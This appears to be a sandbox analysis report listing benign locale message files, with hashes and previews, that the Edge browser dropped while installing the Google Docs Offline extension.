                                                                                                                                                                                                                                                                SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                                Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3107
                                                                                                                                                                                                                                                                Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1389
                                                                                                                                                                                                                                                                Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1763
                                                                                                                                                                                                                                                                Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):930
                                                                                                                                                                                                                                                                Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):913
                                                                                                                                                                                                                                                                Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):806
                                                                                                                                                                                                                                                                Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):883
                                                                                                                                                                                                                                                                Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1031
                                                                                                                                                                                                                                                                Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1613
                                                                                                                                                                                                                                                                Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):848
                                                                                                                                                                                                                                                                Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1425
                                                                                                                                                                                                                                                                Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                Malicious:false
